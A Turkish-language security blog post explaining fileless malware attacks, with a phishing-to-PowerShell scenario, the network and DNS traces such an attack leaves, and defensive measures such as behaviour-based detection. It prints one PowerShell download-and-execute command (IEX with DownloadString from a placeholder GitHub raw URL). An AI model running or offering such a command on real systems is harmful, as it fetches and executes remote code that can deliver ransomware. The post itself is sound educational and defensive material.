Fileless Malware Saldırıları

Fileless Malware Nedir?

Fileless malware, bir cihaza bulaşmak için hedefe yeni bir yazılım yüklemek yerine cihazdaki mevcut yazılımları (Ör: PowerShell) kötü amaçlı kullanan zararlılardır. Direkt olarak hedef sisteme dosya yüklemez ve RAM üzerinde çalışır. Bu yönlerinden dolayı herhangi imza tabanlı bir antivirüs sistemi tarafından tespit edilemez.

Bazı Saldırı Yöntemleri

  • Zararlı URL içeren PDF/Email
  • Zararlı tarayıcı eklentileri

Örnek Saldırı Senaryosu

örnek senaryo
  1. Hedefe sosyal mühendis yöntemleri ile içerisinde zararlı URL olan bir mail gönderilir. 
  2. Hedef linkte tıkladıktan sonra flash ile güvenlik cihazları tarafından güvenilir olarak kabul edilen PowerShell tetiklenir. 
  3. Powershell ile istenilen işlemler başlatılır. (C&C ile iletişim kurma, dosyaları şifreleme, dosya silme)

Aşağıdaki payload örneğinde tetiklenen PowerShell ile uzaktan zararlı kod çekilir ve dosya oluşturmadan çalıştırılır.

IEX (New-Object Net.WebClient).DownloadString(”https://raw.githubusercontent.com/XXXX/XX/XXX’)


Ağ trafiğine bakıldığında ilk olarak “raw.githubusercontent.com” adresi için DNS sorgusunun yapıldığını, ardından “151.101.12.133” IP adresi ile TCP 3 lü el sıkışmanın başlatıldığını görüyoruz.

Ağ Trafiği

Zararlı payloadların çalışması sonucunda sisteme Ransomware bulaştığı görülür.

“raw.githubusercontent.com” adresi için DNS check yapıldığında “151.101.12.133” IP adresine bağlı olduğu görülür.

DNS Check


Ağ trafiği incelendiğinde GitHub’a ait olan bir sayfaya istek atıldığı, prosesler incelendiğinde ise PowerShell çalıştırıldığı görülüyor. Bu durumlar normal şartlarda anormal olmadığı için saldırının SOC takımları tarafından fark edilmesi zorlaşabiliyor. Dikkat edilmesi gereken önemli bir nokta RAM in cihaz kapatılmadan önce incelenmesi veya gerekli logların toplanmasıdır. Saldırı disk yerine RAM üzerinden gerçekleşeceğinden dolayı cihazın kapatılması mevcut izlerin kaybolmasına neden olacaktır.

PowerShell, özellikle sistem adminleri tarafından sıklıkla kullanıldığından dolayı kullanımının engellenmesi mümkün değildir. Ayrıca zararlı kodu indirdiği domaini veya IP adresini engellemek de sıkıntılara yol açacaktır. Çünkü kurum içerisinden birileri iş amaçlı github içeriklerine ulaşması gerekebilir. 

Alınabilecek Önlemler

  • Oltalama saldırılarına karşı e-mail güvenliğini sağlama
  • Kullanılan yazılımların sürekli güncellenmesi
  • Microsoft Office yazılımlarında macro özelliğini devre dışı bırakma
  • Tarayıcılarda Flash ı devre dışı bırakma
  • Sadece imza değil, davranış tabanlı güvenlik sistemleri kullanma

Yaşanmış Örnekler

Hackers Stole $800,000 From Russian ATMs With Disappearing Malware

Fileless attacks against enterprise networks

İlk Yorumu Siz Yapın

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir